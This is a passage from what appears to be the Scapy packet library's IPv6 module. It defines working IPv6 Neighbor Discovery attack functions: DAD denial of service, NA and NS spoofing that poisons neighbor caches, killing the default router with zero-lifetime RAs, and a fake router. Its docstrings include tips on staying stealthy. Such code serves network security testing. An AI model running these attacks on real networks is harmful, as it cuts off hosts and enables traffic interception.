3627 tgt_filter: Same as previous but for a specific target IPv6 address for
3628 received NS. If the target address in the NS message (not the IPv6
3629 destination address) matches that address, then a fake reply will
3630 be sent, i.e. the emitter will be a target of the DoS.
3631
3632 reply_mac: allow specifying a specific source mac address for the reply,
3633 i.e. to prevent the use of the mac address of the interface.
3634 """
3635
3636 def ns_reply_callback(req, reply_mac, iface):
3637 """
3638 Callback that reply to a NS by sending a similar NS
3639 """
3640
3641 # Let's build a reply and send it
3642 mac = req[Ether].src
3643 dst = req[IPv6].dst
3644 tgt = req[ICMPv6ND_NS].tgt
3645 rep = Ether(src=reply_mac) / IPv6(src="::", dst=dst) / ICMPv6ND_NS(tgt=tgt) # noqa: E501
3646 sendp(rep, iface=iface, verbose=0)
3647
3648 print("Reply NS for target address %s (received from %s)" % (tgt, mac))
3649
3650 _NDP_Attack_DAD_DoS(ns_reply_callback, iface, mac_src_filter,
3651 tgt_filter, reply_mac)
3652
3653
3654def NDP_Attack_DAD_DoS_via_NA(iface=None, mac_src_filter=None, tgt_filter=None,
3655 reply_mac=None):
3656 """
3657 Perform the DAD DoS attack using NS described in section 4.1.3 of RFC
3658 3756. This is done by listening incoming NS messages *sent from the
3659 unspecified address* and sending a NA reply for the target address,
3660 leading the peer to believe that another node is also performing DAD
3661 for that address.
3662
3663 By default, the fake NA sent to create the DoS uses:
3664 - as target address the target address found in received NS.
3665 - as IPv6 source address: the target address found in received NS.
3666 - as IPv6 destination address: the link-local solicited-node multicast
3667 address derived from the target address in received NS.
3668 - the mac address of the interface as source (or reply_mac, see below).
3669 - the multicast mac address derived from the solicited node multicast
3670 address used as IPv6 destination address.
3671 - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled
3672 with the mac address used as source of the NA.
3673
3674 Following arguments can be used to change the behavior:
3675
3676 iface: a specific interface (e.g. "eth0") of the system on which the
3677 DoS should be launched. If None is provided conf.iface is used.
3678
3679 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
3680 Only NS messages received from this source will trigger replies.
3681 This allows limiting the effects of the DoS to a single target by
3682 filtering on its mac address. The default value is None: the DoS
3683 is not limited to a specific mac address.
3684
3685 tgt_filter: Same as previous but for a specific target IPv6 address for
3686 received NS. If the target address in the NS message (not the IPv6
3687 destination address) matches that address, then a fake reply will
3688 be sent, i.e. the emitter will be a target of the DoS.
3689
3690 reply_mac: allow specifying a specific source mac address for the reply,
3691 i.e. to prevent the use of the mac address of the interface. This
3692 address will also be used in the Target Link-Layer Address option.
3693 """
3694
3695 def na_reply_callback(req, reply_mac, iface):
3696 """
3697 Callback that reply to a NS with a NA
3698 """
3699
3700 # Let's build a reply and send it
3701 mac = req[Ether].src
3702 dst = req[IPv6].dst
3703 tgt = req[ICMPv6ND_NS].tgt
3704 rep = Ether(src=reply_mac) / IPv6(src=tgt, dst=dst)
3705 rep /= ICMPv6ND_NA(tgt=tgt, S=0, R=0, O=1) # noqa: E741
3706 rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)
3707 sendp(rep, iface=iface, verbose=0)
3708
3709 print("Reply NA for target address %s (received from %s)" % (tgt, mac))
3710
3711 _NDP_Attack_DAD_DoS(na_reply_callback, iface, mac_src_filter,
3712 tgt_filter, reply_mac)
3713
3714
3715def NDP_Attack_NA_Spoofing(iface=None, mac_src_filter=None, tgt_filter=None,
3716 reply_mac=None, router=False):
3717 """
3718 The main purpose of this function is to send fake Neighbor Advertisement
3719 messages to a victim. As the emission of unsolicited Neighbor Advertisement
3720 is pretty pointless (from an attacker standpoint) because it will not
3721 lead to a modification of a victim's neighbor cache, the function send
3722 advertisements in response to received NS (NS sent as part of the DAD,
3723 i.e. with an unspecified address as source, are not considered).
3724
3725 By default, the fake NA sent to create the DoS uses:
3726 - as target address the target address found in received NS.
3727 - as IPv6 source address: the target address
3728 - as IPv6 destination address: the source IPv6 address of received NS
3729 message.
3730 - the mac address of the interface as source (or reply_mac, see below).
3731 - the source mac address of the received NS as destination macs address
3732 of the emitted NA.
3733 - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr)
3734 filled with the mac address used as source of the NA.
3735
3736 Following arguments can be used to change the behavior:
3737
3738 iface: a specific interface (e.g. "eth0") of the system on which the
3739 DoS should be launched. If None is provided conf.iface is used.
3740
3741 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
3742 Only NS messages received from this source will trigger replies.
3743 This allows limiting the effects of the DoS to a single target by
3744 filtering on its mac address. The default value is None: the DoS
3745 is not limited to a specific mac address.
3746
3747 tgt_filter: Same as previous but for a specific target IPv6 address for
3748 received NS. If the target address in the NS message (not the IPv6
3749 destination address) matches that address, then a fake reply will
3750 be sent, i.e. the emitter will be a target of the DoS.
3751
3752 reply_mac: allow specifying a specific source mac address for the reply,
3753 i.e. to prevent the use of the mac address of the interface. This
3754 address will also be used in the Target Link-Layer Address option.
3755
3756 router: by the default (False) the 'R' flag in the NA used for the reply
3757 is not set. If the parameter is set to True, the 'R' flag in the
3758 NA is set, advertising us as a router.
3759
3760 Please, keep the following in mind when using the function: for obvious
3761 reasons (kernel space vs. Python speed), when the target of the address
3762 resolution is on the link, the sender of the NS receives 2 NA messages
3763 in a row, the valid one and our fake one. The second one will overwrite
3764 the information provided by the first one, i.e. the natural latency of
3765 Scapy helps here.
3766
3767 In practice, on a common Ethernet link, the emission of the NA from the
3768 genuine target (kernel stack) usually occurs in the same millisecond as
3769 the receipt of the NS. The NA generated by Scapy6 will usually come after
3770 something 20+ ms. On a usual testbed for instance, this difference is
3771 sufficient to have the first data packet sent from the victim to the
3772 destination before it even receives our fake NA.
3773 """
3774
3775 def is_request(req, mac_src_filter, tgt_filter):
3776 """
3777 Check if packet req is a request
3778 """
3779
3780 # Those simple checks are based on Section 5.4.2 of RFC 4862
3781 if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
3782 return 0
3783
3784 mac_src = req[Ether].src
3785 if mac_src_filter and mac_src != mac_src_filter:
3786 return 0
3787
3788 # Source must NOT be the unspecified address
3789 if req[IPv6].src == "::":
3790 return 0
3791
3792 tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
3793 if tgt_filter and tgt != tgt_filter:
3794 return 0
3795
3796 dst = req[IPv6].dst
3797 if in6_isllsnmaddr(dst): # Address is Link Layer Solicited Node mcast.
3798
3799 # If this is a real address resolution NS, then the destination
3800 # address of the packet is the link-local solicited node multicast
3801 # address associated with the target of the NS.
3802 # Otherwise, the NS is a NUD related one, i.e. the peer is
3803 # unicasting the NS to check the target is still alive (L2
3804 # information is still in its cache and it is verified)
3805 received_snma = inet_pton(socket.AF_INET6, dst)
3806 expected_snma = in6_getnsma(tgt)
3807 if received_snma != expected_snma:
3808 print("solicited node multicast @ does not match target @!")
3809 return 0
3810
3811 return 1
3812
3813 def reply_callback(req, reply_mac, router, iface):
3814 """
3815 Callback that reply to a NS with a spoofed NA
3816 """
3817
3818 # Let's build a reply (as defined in Section 7.2.4. of RFC 4861) and
3819 # send it back.
3820 mac = req[Ether].src
3821 pkt = req[IPv6]
3822 src = pkt.src
3823 tgt = req[ICMPv6ND_NS].tgt
3824 rep = Ether(src=reply_mac, dst=mac) / IPv6(src=tgt, dst=src)
3825 # Use the target field from the NS
3826 rep /= ICMPv6ND_NA(tgt=tgt, S=1, R=router, O=1) # noqa: E741
3827
3828 # "If the solicitation IP Destination Address is not a multicast
3829 # address, the Target Link-Layer Address option MAY be omitted"
3830 # Given our purpose, we always include it.
3831 rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)
3832
3833 sendp(rep, iface=iface, verbose=0)
3834
3835 print("Reply NA for target address %s (received from %s)" % (tgt, mac))
3836
3837 if not iface:
3838 iface = conf.iface
3839 # To prevent sniffing our own traffic
3840 if not reply_mac:
3841 reply_mac = get_if_hwaddr(iface)
3842 sniff_filter = "icmp6 and not ether src %s" % reply_mac
3843
3844 router = 1 if router else 0 # Value of the R flags in NA
3845
3846 sniff(store=0,
3847 filter=sniff_filter,
3848 lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
3849 prn=lambda x: reply_callback(x, reply_mac, router, iface),
3850 iface=iface)
3851
3852
3853def NDP_Attack_NS_Spoofing(src_lladdr=None, src=None, target="2001:db8::1",
3854 dst=None, src_mac=None, dst_mac=None, loop=True,
3855 inter=1, iface=None):
3856 """
3857 The main purpose of this function is to send fake Neighbor Solicitations
3858 messages to a victim, in order to either create a new entry in its neighbor
3859 cache or update an existing one. In section 7.2.3 of RFC 4861, it is stated
3860 that a node SHOULD create the entry or update an existing one (if it is not
3861 currently performing DAD for the target of the NS). The entry's reachability # noqa: E501
3862 state is set to STALE.
3863
3864 The two main parameters of the function are the source link-layer address
3865 (carried by the Source Link-Layer Address option in the NS) and the
3866 source address of the packet.
3867
3868 Unlike some other NDP_Attack_* function, this one is not based on a
3869 stimulus/response model. When called, it sends the same NS packet in loop
3870 every second (the default)
3871
3872 Following arguments can be used to change the format of the packets:
3873
3874 src_lladdr: the MAC address used in the Source Link-Layer Address option
3875 included in the NS packet. This is the address that the peer should
3876 associate in its neighbor cache with the IPv6 source address of the
3877 packet. If None is provided, the mac address of the interface is
3878 used.
3879
3880 src: the IPv6 address used as source of the packet. If None is provided,
3881 an address associated with the emitting interface will be used
3882 (based on the destination address of the packet).
3883
3884 target: the target address of the NS packet. If no value is provided,
3885 a dummy address (2001:db8::1) is used. The value of the target
3886 has a direct impact on the destination address of the packet if it
3887 is not overridden. By default, the solicited-node multicast address
3888 associated with the target is used as destination address of the
3889 packet. Consider specifying a specific destination address if you
3890 intend to use a target address different than the one of the victim.
3891
3892 dst: The destination address of the NS. By default, the solicited node
3893 multicast address associated with the target address (see previous
3894 parameter) is used if no specific value is provided. The victim
3895 is not expected to check the destination address of the packet,
3896 so using a multicast address like ff02::1 should work if you want
3897 the attack to target all hosts on the link. On the contrary, if
3898 you want to be more stealth, you should provide the target address
3899 for this parameter in order for the packet to be sent only to the
3900 victim.
3901
3902 src_mac: the MAC address used as source of the packet. By default, this
3903 is the address of the interface. If you want to be more stealth,
3904 feel free to use something else. Note that this address is not the
3905 that the victim will use to populate its neighbor cache.
3906
3907 dst_mac: The MAC address used as destination address of the packet. If
3908 the IPv6 destination address is multicast (all-nodes, solicited
3909 node, ...), it will be computed. If the destination address is
3910 unicast, a neighbor solicitation will be performed to get the
3911 associated address. If you want the attack to be stealth, you
3912 can provide the MAC address using this parameter.
3913
3914 loop: By default, this parameter is True, indicating that NS packets
3915 will be sent in loop, separated by 'inter' seconds (see below).
3916 When set to False, a single packet is sent.
3917
3918 inter: When loop parameter is True (the default), this parameter provides
3919 the interval in seconds used for sending NS packets.
3920
3921 iface: to force the sending interface.
3922 """
3923
3924 if not iface:
3925 iface = conf.iface
3926
3927 # Use provided MAC address as source link-layer address option
3928 # or the MAC address of the interface if none is provided.
3929 if not src_lladdr:
3930 src_lladdr = get_if_hwaddr(iface)
3931
3932 # Prepare packets parameters
3933 ether_params = {}
3934 if src_mac:
3935 ether_params["src"] = src_mac
3936
3937 if dst_mac:
3938 ether_params["dst"] = dst_mac
3939
3940 ipv6_params = {}
3941 if src:
3942 ipv6_params["src"] = src
3943 if dst:
3944 ipv6_params["dst"] = dst
3945 else:
3946 # Compute the solicited-node multicast address
3947 # associated with the target address.
3948 tmp = inet_ntop(socket.AF_INET6,
3949 in6_getnsma(inet_pton(socket.AF_INET6, target)))
3950 ipv6_params["dst"] = tmp
3951
3952 pkt = Ether(**ether_params)
3953 pkt /= IPv6(**ipv6_params)
3954 pkt /= ICMPv6ND_NS(tgt=target)
3955 pkt /= ICMPv6NDOptSrcLLAddr(lladdr=src_lladdr)
3956
3957 sendp(pkt, inter=inter, loop=loop, iface=iface, verbose=0)
3958
3959
3960def NDP_Attack_Kill_Default_Router(iface=None, mac_src_filter=None,
3961 ip_src_filter=None, reply_mac=None,
3962 tgt_mac=None):
3963 """
3964 The purpose of the function is to monitor incoming RA messages
3965 sent by default routers (RA with a non-zero Router Lifetime values)
3966 and invalidate them by immediately replying with fake RA messages
3967 advertising a zero Router Lifetime value.
3968
3969 The result on receivers is that the router is immediately invalidated,
3970 i.e. the associated entry is discarded from the default router list
3971 and destination cache is updated to reflect the change.
3972
3973 By default, the function considers all RA messages with a non-zero
3974 Router Lifetime value but provides configuration knobs to allow
3975 filtering RA sent by specific routers (Ethernet source address).
3976 With regard to emission, the multicast all-nodes address is used
3977 by default but a specific target can be used, in order for the DoS to
3978 apply only to a specific host.
3979
3980 More precisely, following arguments can be used to change the behavior:
3981
3982 iface: a specific interface (e.g. "eth0") of the system on which the
3983 DoS should be launched. If None is provided conf.iface is used.
3984
3985 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
3986 Only RA messages received from this source will trigger replies.
3987 If other default routers advertised their presence on the link,
3988 their clients will not be impacted by the attack. The default
3989 value is None: the DoS is not limited to a specific mac address.
3990
3991 ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
3992 on. Only RA messages received from this source address will trigger
3993 replies. If other default routers advertised their presence on the
3994 link, their clients will not be impacted by the attack. The default
3995 value is None: the DoS is not limited to a specific IPv6 source
3996 address.
3997
3998 reply_mac: allow specifying a specific source mac address for the reply,
3999 i.e. to prevent the use of the mac address of the interface.
4000
4001 tgt_mac: allow limiting the effect of the DoS to a specific host,
4002 by sending the "invalidating RA" only to its mac address.
4003 """
4004
4005 def is_request(req, mac_src_filter, ip_src_filter):
4006 """
4007 Check if packet req is a request
4008 """
4009
4010 if not (Ether in req and IPv6 in req and ICMPv6ND_RA in req):
4011 return 0
4012
4013 mac_src = req[Ether].src
4014 if mac_src_filter and mac_src != mac_src_filter:
4015 return 0
4016
4017 ip_src = req[IPv6].src
4018 if ip_src_filter and ip_src != ip_src_filter:
4019 return 0
4020
4021 # Check if this is an advertisement for a Default Router
4022 # by looking at Router Lifetime value
4023 if req[ICMPv6ND_RA].routerlifetime == 0:
4024 return 0
4025
4026 return 1
4027
4028 def ra_reply_callback(req, reply_mac, tgt_mac, iface):
4029 """
4030 Callback that sends an RA with a 0 lifetime
4031 """
4032
4033 # Let's build a reply and send it
4034
4035 src = req[IPv6].src
4036
4037 # Prepare packets parameters
4038 ether_params = {}
4039 if reply_mac:
4040 ether_params["src"] = reply_mac
4041
4042 if tgt_mac:
4043 ether_params["dst"] = tgt_mac
4044
4045 # Basis of fake RA (high pref, zero lifetime)
4046 rep = Ether(**ether_params) / IPv6(src=src, dst="ff02::1")
4047 rep /= ICMPv6ND_RA(prf=1, routerlifetime=0)
4048
4049 # Add it a PIO from the request ...
4050 tmp = req
4051 while ICMPv6NDOptPrefixInfo in tmp:
4052 pio = tmp[ICMPv6NDOptPrefixInfo]
4053 tmp = pio.payload
4054 del pio.payload
4055 rep /= pio
4056
4057 # ... and source link layer address option
4058 if ICMPv6NDOptSrcLLAddr in req:
4059 mac = req[ICMPv6NDOptSrcLLAddr].lladdr
4060 else:
4061 mac = req[Ether].src
4062 rep /= ICMPv6NDOptSrcLLAddr(lladdr=mac)
4063
4064 sendp(rep, iface=iface, verbose=0)
4065
4066 print("Fake RA sent with source address %s" % src)
4067
4068 if not iface:
4069 iface = conf.iface
4070 # To prevent sniffing our own traffic
4071 if not reply_mac:
4072 reply_mac = get_if_hwaddr(iface)
4073 sniff_filter = "icmp6 and not ether src %s" % reply_mac
4074
4075 sniff(store=0,
4076 filter=sniff_filter,
4077 lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter),
4078 prn=lambda x: ra_reply_callback(x, reply_mac, tgt_mac, iface),
4079 iface=iface)
4080
4081
4082def NDP_Attack_Fake_Router(ra, iface=None, mac_src_filter=None,
4083 ip_src_filter=None):
4084 """
4085 The purpose of this function is to send provided RA message at layer 2
4086 (i.e. providing a packet starting with IPv6 will not work) in response
4087 to received RS messages. In the end, the function is a simple wrapper
4088 around sendp() that monitor the link for RS messages.
4089
4090 It is probably better explained with an example:
4091
4092 >>> ra = Ether()/IPv6()/ICMPv6ND_RA()
4093 >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64)
4094 >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:2::", prefixlen=64)
4095 >>> ra /= ICMPv6NDOptSrcLLAddr(lladdr="00:11:22:33:44:55")
4096 >>> NDP_Attack_Fake_Router(ra, iface="eth0")
4097 Fake RA sent in response to RS from fe80::213:58ff:fe8c:b573
4098 Fake RA sent in response to RS from fe80::213:72ff:fe8c:b9ae
4099 ...
4100
4101 Following arguments can be used to change the behavior:
4102
4103 ra: the RA message to send in response to received RS message.
4104
4105 iface: a specific interface (e.g. "eth0") of the system on which the
4106 DoS should be launched. If none is provided, conf.iface is
4107 used.
4108
4109 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
4110 Only RS messages received from this source will trigger a reply.
4111 Note that no changes to provided RA is done which imply that if
4112 you intend to target only the source of the RS using this option,
4113 you will have to set the Ethernet destination address to the same
4114 value in your RA.
4115 The default value for this parameter is None: no filtering on the
4116 source of RS is done.
4117
4118 ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
4119 on. Only RS messages received from this source address will trigger
4120 replies. Same comment as for previous argument apply: if you use
4121 the option, you will probably want to set a specific Ethernet
4122 destination address in the RA.
4123 """
4124
4125 def is_request(req, mac_src_filter, ip_src_filter):
4126 """
4127 Check if packet req is a request
4128 """
4129
4130 if not (Ether in req and IPv6 in req and ICMPv6ND_RS in req):
4131 return 0
4132
4133 mac_src = req[Ether].src
4134 if mac_src_filter and mac_src != mac_src_filter:
4135 return 0
4136
4137 ip_src = req[IPv6].src
4138 if ip_src_filter and ip_src != ip_src_filter:
4139 return 0
4140
4141 return 1
4142
4143 def ra_reply_callback(req, iface):
4144 """
4145 Callback that sends an RA in reply to an RS
4146 """
4147
4148 src = req[IPv6].src
4149 sendp(ra, iface=iface, verbose=0)
4150 print("Fake RA sent in response to RS from %s" % src)
4151
4152 if not iface:
4153 iface = conf.iface
4154 sniff_filter = "icmp6"
4155
4156 sniff(store=0,
4157 filter=sniff_filter,
4158 lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter),
4159 prn=lambda x: ra_reply_callback(x, iface),
4160 iface=iface)
4161
4162#############################################################################
4163# Pre-load classes ##
4164#############################################################################
4165
4166
4167def _get_cls(name):
4168 return globals().get(name, Raw)
4169
4170
4171def _load_dict(d):
4172 for k, v in d.items():
4173 d[k] = _get_cls(v)
4174
4175
4176_load_dict(icmp6ndoptscls)
4177_load_dict(icmp6typescls)
4178_load_dict(ipv6nhcls)
4179
4180#############################################################################
4181#############################################################################
4182# Layers binding #
4183#############################################################################
4184#############################################################################
4185
4186conf.l3types.register(ETH_P_IPV6, IPv6)
4187conf.l3types.register_num2layer(ETH_P_ALL, IPv46)
4188conf.l2types.register(31, IPv6)
4189conf.l2types.register(DLT_IPV6, IPv6)
4190conf.l2types.register(DLT_RAW, IPv46)
4191conf.l2types.register_num2layer(DLT_RAW_ALT, IPv46)
4192
4193bind_layers(Ether, IPv6, type=0x86dd)
4194bind_layers(CookedLinux, IPv6, proto=0x86dd)
4195bind_layers(GRE, IPv6, proto=0x86dd)
4196bind_layers(SNAP, IPv6, code=0x86dd)
4197# AF_INET6 values are platform-dependent. For a detailed explaination, read
4198# https://github.com/the-tcpdump-group/libpcap/blob/f98637ad7f086a34c4027339c9639ae1ef842df3/gencode.c#L3333-L3354 # noqa: E501
4199if WINDOWS:
4200 bind_layers(Loopback, IPv6, type=0x18)
4201else:
4202 bind_layers(Loopback, IPv6, type=socket.AF_INET6)
4203bind_layers(IPerror6, TCPerror, nh=socket.IPPROTO_TCP)
4204bind_layers(IPerror6, UDPerror, nh=socket.IPPROTO_UDP)
4205bind_layers(IPv6, TCP, nh=socket.IPPROTO_TCP)
4206bind_layers(IPv6, UDP, nh=socket.IPPROTO_UDP)
4207bind_layers(IP, IPv6, proto=socket.IPPROTO_IPV6)
4208bind_layers(IPv6, IPv6, nh=socket.IPPROTO_IPV6)
4209bind_layers(IPv6, IP, nh=socket.IPPROTO_IPIP)
4210bind_layers(IPv6, GRE, nh=socket.IPPROTO_GRE)